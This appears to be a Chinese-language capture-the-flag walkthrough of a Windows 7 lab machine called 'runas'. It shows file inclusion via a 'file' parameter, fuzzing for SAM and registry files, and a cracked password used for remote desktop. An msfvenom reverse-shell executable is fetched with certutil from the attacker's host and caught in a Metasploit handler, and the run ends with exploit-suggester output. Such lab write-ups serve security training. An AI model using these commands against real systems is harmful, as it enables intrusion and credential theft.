runas
runas
信息搜集
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
┌──(kali㉿kali)-[~/temp/runas]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TreadStone was here 🚀
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.10.105:139
Open 192.168.10.105:445
Open 192.168.10.105:80
Open 192.168.10.105:135
Open 192.168.10.105:3389
Open 192.168.10.105:5357
Open 192.168.10.105:49153
Open 192.168.10.105:49154
Open 192.168.10.105:49156
Open 192.168.10.105:49157
Open 192.168.10.105:49152
Open 192.168.10.105:49155
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 128 Apache httpd 2.4.57 ((Win64) PHP/7.2.0)
|_http-server-header: Apache/2.4.57 (Win64) PHP/7.2.0
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-title: Index of /
135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 128 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ms-wbt-server? syn-ack ttl 128
|_ssl-date: 2025-06-08T00:07:17+00:00; +5s from scanner time.
| ssl-cert: Subject: commonName=runas-PC
| Issuer: commonName=runas-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2025-06-07T00:01:50
| Not valid after: 2025-12-07T00:01:50
| MD5: 79d2:2c91:6900:cf44:07c4:be17:ad76:b183
| SHA-1: 2a37:06f2:d351:9e58:d031:f6d4:1d46:7419:11f9:7470
| -----BEGIN CERTIFICATE-----
| MIIC1DCCAbygAwIBAgIQbmwyyXTSJoZIeYTVho1hWDANBgkqhkiG9w0BAQUFADAT
| MREwDwYDVQQDEwhydW5hcy1QQzAeFw0yNTA2MDcwMDAxNTBaFw0yNTEyMDcwMDAx
| NTBaMBMxETAPBgNVBAMTCHJ1bmFzLVBDMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
| MIIBCgKCAQEAz/9/onOUclAE92QDCErEIK35pXJ/RyJqibUfdZNbttNACY0USk51
| OKqFI0cKOKQsXoc6Grxl7UfVwC9v6ZCoYTWl3YgMUq0auV8WoWluH1YaZ/Oro8LD
| H9RCqE0/Dia8GOcmjkMlpIOA5sewWj4t09Mcs2gf1ALEeZfKgMwgyAwp7zjkOKpr
| aR9mPudZWvcSvB9Cv0i69/hfuixH4InCSsgM86jBXtqlpDD01XkT5u2xgXbd4GOL
| 4PyHdomFahgeyvytPZ8b9RamvNh8xBtHBqKF1Tdur993m6Y/T1k1vficRRuvs4tm
| kKn6YaabmEpjbFd9AiRAqJrnQqsYIZ7ZXwIDAQABoyQwIjATBgNVHSUEDDAKBggr
| BgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQEFBQADggEBAHjb9pGELhjm
| mOKB1ZhxwqGSc9+01mmb8rdS1Va/fkusoogYG4mkurnukDNmUwwKCPsP9XWdQjgA
| gz9K9+/N4hMkhKptzBKAAj+JGcz7BJnSlkLKHnRsDaNAlTIN8r7fIFqLY2hh/VrI
| wFITd2yNOlXryUuBcXyzkdpn0q5QtwWsrcvLri/i7h3Gg4LwdxfKE/YFfG1VPLxH
| dVurHBpA2OYAOoEb3jZRhA/ryLSTV2Q3N437MBC1HTXH40JnVuS9PJuNdR7j4MM9
| SMcpaGij6vIhUU2RAnsZhL25knOEsgPMyzrePAYWYu4ZZP18XlkiyShXibwx9tN8
| ZiLbLHEvkpg=
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: RUNAS-PC
| NetBIOS_Domain_Name: RUNAS-PC
| NetBIOS_Computer_Name: RUNAS-PC
| DNS_Domain_Name: runas-PC
| DNS_Computer_Name: runas-PC
| Product_Version: 6.1.7601
|_ System_Time: 2025-06-08T00:07:12+00:00
5357/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
49152/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49156/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49157/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
MAC Address: 08:00:27:15:AC:5F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: RUNAS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 58509/tcp): CLEAN (Couldn't connect)
| Check 2 (port 48287/tcp): CLEAN (Couldn't connect)
| Check 3 (port 7707/udp): CLEAN (Timeout)
| Check 4 (port 10964/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: RUNAS-PC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:15:ac:5f (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| Names:
| RUNAS-PC<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| RUNAS-PC<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| Statistics:
| 08:00:27:15:ac:5f:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: runas-PC
| NetBIOS computer name: RUNAS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-06-08T03:07:12+03:00
| smb2-time:
| date: 2025-06-08T00:07:12
|_ start_date: 2025-06-08T00:01:48
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -35m55s, deviation: 1h20m29s, median: 4s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
目录扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(kali㉿kali)-[~/temp/runas]
└─$ dirsearch -u http://$IP/
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/temp/runas/reports/http_192.168.10.105/__25-06-07_20-18-05.txt
Target: http://192.168.10.105/
[20:18:05] Starting:
[20:18:05] 403 - 199B - /%C0%AE%C0%AE%C0%AF
[20:18:05] 403 - 199B - /%3f/
[20:18:05] 403 - 199B - /%ff
[20:18:08] 403 - 199B - /.ht_wsr.txt
[20:18:08] 403 - 199B - /.htaccess.bak1
[20:18:08] 403 - 199B - /.htaccess.save
[20:18:09] 403 - 199B - /.htaccess.sample
[20:18:09] 403 - 199B - /.htaccess.orig
[20:18:09] 403 - 199B - /.htaccess_orig
[20:18:09] 403 - 199B - /.htaccess_extra
[20:18:09] 403 - 199B - /.htaccess_sc
[20:18:09] 403 - 199B - /.htaccessOLD2
[20:18:09] 403 - 199B - /.htaccessBAK
[20:18:09] 403 - 199B - /.htaccessOLD
[20:18:09] 403 - 199B - /.htm
[20:18:09] 403 - 199B - /.html
[20:18:09] 403 - 199B - /.htpasswd_test
[20:18:09] 403 - 199B - /.htpasswds
[20:18:09] 403 - 199B - /.httr-oauth
[20:18:27] 403 - 199B - /cgi-bin/
[20:18:27] 500 - 530B - /cgi-bin/printenv.pl
[20:18:39] 200 - 414B - /index.php
[20:18:39] 200 - 414B - /index.pHp
[20:18:39] 200 - 414B - /index.php.
[20:18:39] 403 - 199B - /index.php::$DATA
[20:18:39] 200 - 414B - /index.php/login/
[20:19:01] 403 - 199B - /Trace.axd::$DATA
[20:19:04] 403 - 199B - /web.config::$DATA
Task Completed
漏洞发现
踩点
1
2
3
4
5
┌──(kali㉿kali)-[~/temp/runas]
└─$ curl -s http://$IP/ | html2text
****** Index of / ******
* index.php
* styles.css
fuzz参数
尝试一下是否可以包含文件:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
┌──(kali㉿kali)-[~/temp/runas]
└─$ curl -s "http://$IP/index.php?file=styles.css" | html2text
****** There is no going back! ******
***** ?file= *****
body {
font-family: Arial, sans-serif;
background-color: #f4f4f4;
margin: 0;
padding: 0;
}
.container {
max-width: 600px;
margin: 50px auto;
padding: 20px;
background-color: white;
border-radius: 8px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
text-align: center;
}
h1 {
color: #333;
margin-bottom: 20px;
}
form {
margin-bottom: 20px;
}
input[type="text"] {
width: 80%;
padding: 10px;
border: 1px solid #ccc;
border-radius: 4px;
margin-right: 10px;
}
button {
padding: 10px 15px;
background-color: #28a745;
color: white;
border: none;
border-radius: 4px;
cursor: pointer;
}
button:hover {
background-color: #218838;
}
.output {
margin-top: 20px;
text-align: left;
}
说明可以,尝试常见的目录穿越,但是未果,尝试fuzz一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
┌──(kali㉿kali)-[~/temp/runas]
└─$ wfuzz -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -u "http://$IP/index.php?file=FUZZ" --hw 35
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.10.105/index.php?file=FUZZ
Total requests: 236
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000015: 200 1928 L 12417 W 85387 Ch "C:/php/php.ini"
000000044: 200 38 L 189 W 1375 Ch "C:/WINDOWS/System32/drivers/etc/hosts"
000000045: 200 45 L 96 W 1042 Ch "C:/Windows/win.ini"
000000041: 200 17 L 33 W 425 Ch "C:/Windows/repair/system"
000000040: 200 17 L 33 W 425 Ch "C:/WINDOWS/Repair/SAM"
000000078: 200 1928 L 12417 W 85387 Ch "c:/PHP/php.ini"
000000077: 200 1928 L 12417 W 85387 Ch "c:/php/php.ini"
000000067: 200 820 L 3729 W 79253 Ch "C:/Windows/System32/inetsrv/config/applicationHost.config"
000000064: 200 19 L 50 W 632 Ch "C:/Windows/system32/config/regback/software"
000000066: 200 598 L 2797 W 58608 Ch "C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml"
000000062: 200 19 L 50 W 632 Ch "C:/Windows/system32/config/regback/security"
000000063: 200 19 L 50 W 630 Ch "C:/Windows/system32/config/regback/system"
000000061: 200 19 L 50 W 627 Ch "C:/Windows/system32/config/regback/sam"
000000060: 200 19 L 50 W 631 Ch "C:/Windows/system32/config/regback/default"
000000001: 200 17 L 33 W 425 Ch "C:/Users/Administrator/NTUser.dat"
000000223: 200 302 L 1569 W 19622 Ch "c:/WINDOWS/system32/drivers/etc/services"
000000220: 200 96 L 700 W 4760 Ch "c:/WINDOWS/system32/drivers/etc/lmhosts.sam"
000000222: 200 44 L 232 W 1973 Ch "c:/WINDOWS/system32/drivers/etc/protocol"
000000219: 200 38 L 189 W 1375 Ch "c:/WINDOWS/system32/drivers/etc/hosts"
000000230: 200 17 L 33 W 425 Ch "c:/WINDOWS/setuperr.log"
000000228: 200 313 L 2051 W 25712 Ch "c:/WINDOWS/setupact.log"
000000221: 200 33 L 105 W 946 Ch "c:/WINDOWS/system32/drivers/etc/networks"
000000233: 200 1170 L 13297 W 108051 Ch "c:/WINDOWS/WindowsUpdate.log"
Total time: 0.456759
Processed Requests: 236
Filtered Requests: 213
Requests/sec.: 516.6836
信息搜集
完全没有想到的利用方法。。。只能挨个查看一下目录了。。。
1
2
┌──(kali㉿kali)-[~/temp/runas]
└─$ wfuzz -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -u "http://$IP/index.php?file=FUZZ" --hw 35 2>/dev/null > wfuzz.log
这里有很神奇的情况发生,请看vcr:
用bat只是为了美观,cat -A同样可以,两个查出来的居然差这么多。。。。。说明导入文件的部分内容是不可见的,而非不存在的。。。服了,我还以为见到鬼了,正则半天发现越筛选越多了。。。。。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
┌──(kali㉿kali)-[~/temp/runas]
└─$ cat wfuzz.log | grep -v "35" | grep -oP '"\K[^"]+' > wfuzz.log1
┌──(kali㉿kali)-[~/temp/runas]
└─$ cat -A wfuzz.log1
C:/Users/Administrator/NTUser.dat$
^[[0m$
C:/php/php.ini$
^[[0m$
C:/Windows/win.ini$
^[[0m$
C:/WINDOWS/Repair/SAM$
^[[0m$
C:/Windows/repair/system$
^[[0m$
C:/WINDOWS/System32/drivers/etc/hosts$
^[[0m$
c:/php/php.ini$
^[[0m$
C:/Windows/System32/inetsrv/config/applicationHost.config$
^[[0m$
c:/PHP/php.ini$
^[[0m$
C:/Windows/system32/config/regback/software$
^[[0m$
C:/Windows/system32/config/regback/security$
^[[0m$
C:/Windows/system32/config/regback/sam$
^[[0m$
C:/Windows/system32/config/regback/default$
^[[0m$
C:/Windows/system32/config/regback/system$
^[[0m$
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml$
^[[0m$
c:/WINDOWS/system32/drivers/etc/lmhosts.sam$
^[[0m$
c:/WINDOWS/setuperr.log$
^[[0m$
c:/WINDOWS/WindowsUpdate.log$
^[[0m$
c:/WINDOWS/system32/drivers/etc/services$
^[[0m$
c:/WINDOWS/setupact.log$
^[[0m$
c:/WINDOWS/system32/drivers/etc/hosts$
^[[0m$
c:/WINDOWS/system32/drivers/etc/protocol$
^[[0m$
c:/WINDOWS/system32/drivers/etc/networks$
^[[0m$
┌──(kali㉿kali)-[~/temp/runas]
└─$ cat wfuzz.log1 | sort | tail -n 23 > wfuzz.log2
┌──(kali㉿kali)-[~/temp/runas]
└─$ cat wfuzz.log2
c:/php/php.ini
c:/PHP/php.ini
C:/php/php.ini
C:/Users/Administrator/NTUser.dat
C:/WINDOWS/Repair/SAM
C:/Windows/repair/system
c:/WINDOWS/setupact.log
c:/WINDOWS/setuperr.log
C:/Windows/system32/config/regback/default
C:/Windows/system32/config/regback/sam
C:/Windows/system32/config/regback/security
C:/Windows/system32/config/regback/software
C:/Windows/system32/config/regback/system
c:/WINDOWS/system32/drivers/etc/hosts
C:/WINDOWS/System32/drivers/etc/hosts
c:/WINDOWS/system32/drivers/etc/lmhosts.sam
c:/WINDOWS/system32/drivers/etc/networks
c:/WINDOWS/system32/drivers/etc/protocol
c:/WINDOWS/system32/drivers/etc/services
C:/Windows/System32/inetsrv/config/applicationHost.config
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
c:/WINDOWS/WindowsUpdate.log
C:/Windows/win.ini
尝试看一下有啥:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(kali㉿kali)-[~/temp/runas]
└─$ while IFS= read -r filename; do echo "[+] 已访问: \"$filename\""; echo "[+] 当前目录为:\"$filename\"" >> results.log; curl -s "http://192.168.10.105/index.php?file=${filename}" | html2text >> results.log; echo "" >> results.log; done < wfuzz.log2
[+] 已访问: "c:/php/php.ini"
[+] 已访问: "c:/PHP/php.ini"
[+] 已访问: "C:/php/php.ini"
[+] 已访问: "C:/Users/Administrator/NTUser.dat"
[+] 已访问: "C:/WINDOWS/Repair/SAM"
[+] 已访问: "C:/Windows/repair/system"
[+] 已访问: "c:/WINDOWS/setupact.log"
[+] 已访问: "c:/WINDOWS/setuperr.log"
[+] 已访问: "C:/Windows/system32/config/regback/default"
[+] 已访问: "C:/Windows/system32/config/regback/sam"
[+] 已访问: "C:/Windows/system32/config/regback/security"
[+] 已访问: "C:/Windows/system32/config/regback/software"
[+] 已访问: "C:/Windows/system32/config/regback/system"
[+] 已访问: "c:/WINDOWS/system32/drivers/etc/hosts"
[+] 已访问: "C:/WINDOWS/System32/drivers/etc/hosts"
[+] 已访问: "c:/WINDOWS/system32/drivers/etc/lmhosts.sam"
[+] 已访问: "c:/WINDOWS/system32/drivers/etc/networks"
[+] 已访问: "c:/WINDOWS/system32/drivers/etc/protocol"
[+] 已访问: "c:/WINDOWS/system32/drivers/etc/services"
[+] 已访问: "C:/Windows/System32/inetsrv/config/applicationHost.config"
[+] 已访问: "C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml"
[+] 已访问: "c:/WINDOWS/WindowsUpdate.log"
[+] 已访问: "C:/Windows/win.ini"
┌──(kali㉿kali)-[~/temp/runas]
└─$ cat results.log | grep runas
process as runas-PC\Administrator in session 2
process as runas-PC\Administrator in session 2
process as runas-PC\Administrator in session 1
process as runas-PC\Administrator in session 1
; MD5-runas-b3a805b2594befb6c846d718d1224557
找到了一个md5,尝试进行破解:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
┌──(kali㉿kali)-[~/temp/runas]
└─$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: b3a805b2594befb6c846d718d1224557
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
远程登录
得到凭证:runas:yakuzza。尝试进行ssh登录,但是发现没开启22端口,所幸目标主机开启了3389端口,尝试使用win+R再mstsc进行远程桌面登录:
成功登录到远程桌面,尝试弹一个shell回来,本地先生成一个shell:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿kali)-[~/temp/runas]
└─$ msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.103 lport=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
┌──(kali㉿kali)-[~/temp/runas]
└─$ updog -p 8888
[+] Serving /home/kali/temp/runas...
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on all addresses (0.0.0.0)
* Running on http://127.0.0.1:8888
* Running on http://192.168.10.103:8888
Press CTRL+C to quit
然后在另一个窗口中设置监听:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(kali㉿kali)-[~/temp/runas]
└─$ msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set lhost 192.168.10.103
lhost => 192.168.10.103
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.10.103:4444
这次就用默认的端口了,然后在远程桌面使用cmd进行下载,使用:
改为英语,再下载:
1
certutil -urlcache -split -f http://192.168.10.103:8888/shell.exe
成功下载,本地也能看到:
然后激活一下:
发现弹回来了:
提权
信息搜集
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
meterpreter > shell
Process 2448 created.
Channel 1 created.
Microsoft Windows [S�r�m 6.1.7601]
Telif Hakk� (c) 2009 Microsoft Corporation. T�m haklar� sakl�d�r.
C:\Users\runas>whoami
whoami
runas-pc\runas
C:\Users\runas>dir
dir
C s�r�c�s�ndeki birimin etiketi yok.
Birim Seri Numaras�: 542C-C630
C:\Users\runas dizini
08.06.2025 05:02 <DIR> .
08.06.2025 05:02 <DIR> ..
06.10.2024 21:38 <DIR> Contacts
09.10.2024 18:24 <DIR> Desktop
06.10.2024 21:38 <DIR> Documents
06.10.2024 21:38 <DIR> Downloads
06.10.2024 21:38 <DIR> Favorites
06.10.2024 21:38 <DIR> Links
06.10.2024 21:38 <DIR> Music
06.10.2024 21:38 <DIR> Pictures
06.10.2024 21:38 <DIR> Saved Games
06.10.2024 21:38 <DIR> Searches
08.06.2025 05:02 73.802 shell.exe
06.10.2024 21:38 <DIR> Videos
1 Dosya 73.802 bayt
13 Dizin 21.675.307.008 bayt bo�
C:\Users\runas>cd Desktop
cd Desktop
C:\Users\runas\Desktop>dir
dir
C s�r�c�s�ndeki birimin etiketi yok.
Birim Seri Numaras�: 542C-C630
C:\Users\runas\Desktop dizini
09.10.2024 18:24 <DIR> .
09.10.2024 18:24 <DIR> ..
08.10.2024 17:07 31 user.txt
1 Dosya 31 bayt
2 Dizin 21.675.307.008 bayt bo�
C:\Users\runas\Desktop>type user.txt
type user.txt
HMV{User_Flag_Was_A_Bit_Bitter}
C:\Users\runas\Desktop>^Z
Background channel 1? [y/N] y
meterpreter > getuid
Server username: runas-PC\runas
meterpreter > route
IPv4 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 192.168.10.1 10 11
127.0.0.0 255.0.0.0 127.0.0.1 306 1
127.0.0.1 255.255.255.255 127.0.0.1 306 1
127.255.255.255 255.255.255.255 127.0.0.1 306 1
192.168.10.0 255.255.255.0 192.168.10.105 266 11
192.168.10.105 255.255.255.255 192.168.10.105 266 11
192.168.10.255 255.255.255.255 192.168.10.105 266 11
224.0.0.0 240.0.0.0 127.0.0.1 306 1
224.0.0.0 240.0.0.0 192.168.10.105 266 11
255.255.255.255 255.255.255.255 127.0.0.1 306 1
255.255.255.255 255.255.255.255 192.168.10.105 266 11
IPv6 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
:: ffff:ffff:: fe80::4e10:d5ff:fe0a:f900 266 11
::1 ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff :: 266 1
fd00:4c10:d50a:f900:: ffff:ffff:ffff:ffff:ffff:ffff:: :: 18 11
fd00:4c10:d50a:f900::1002 ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff :: 266 11
fd00:4c10:d50a:f900:65b5:ae9f:d9e6:7e7a ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff :: 266 11
fd00:4c10:d50a:f900:e4d0:6fc2:8968:4806 ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff :: 266 11
fe80:: ffff:ffff:ffff:ffff:ffff:ffff:: :: 266 11
fe80::5efe:c0a8:a69 ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff :: 266 12
fe80::65b5:ae9f:d9e6:7e7a ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff :: 266 11
ff00:: ff00:: :: 266 1
ff00:: ff00:: :: 266 11
meterpreter > systeminfo
[-] Unknown command: systeminfo. Did you mean sysinfo? Run the help command for more details.
meterpreter > sysinfo
Computer : RUNAS-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : tr_TR
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > pwd
C:\Users\runas
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows runas-PC\runas @ RUNAS-PC 192.168.10.103:4444 -> 192.168.10.105:49161 (192.168.10.105)
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.10.105 - Collecting local exploits for x86/windows...
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/logging-2.4.0/lib/logging.rb:10: warning: /usr/lib/x86_64-linux-gnu/ruby/3.3.0/syslog.so was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 3.4.0.
You can add syslog to your Gemfile or gemspec to silence this warning.
Also please contact the author of logging-2.4.0 to request adding syslog into its gemspec.
[*] 192.168.10.105 - 203 exploit checks are being tried...
[+] 192.168.10.105 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 192.168.10.105 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.10.105 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
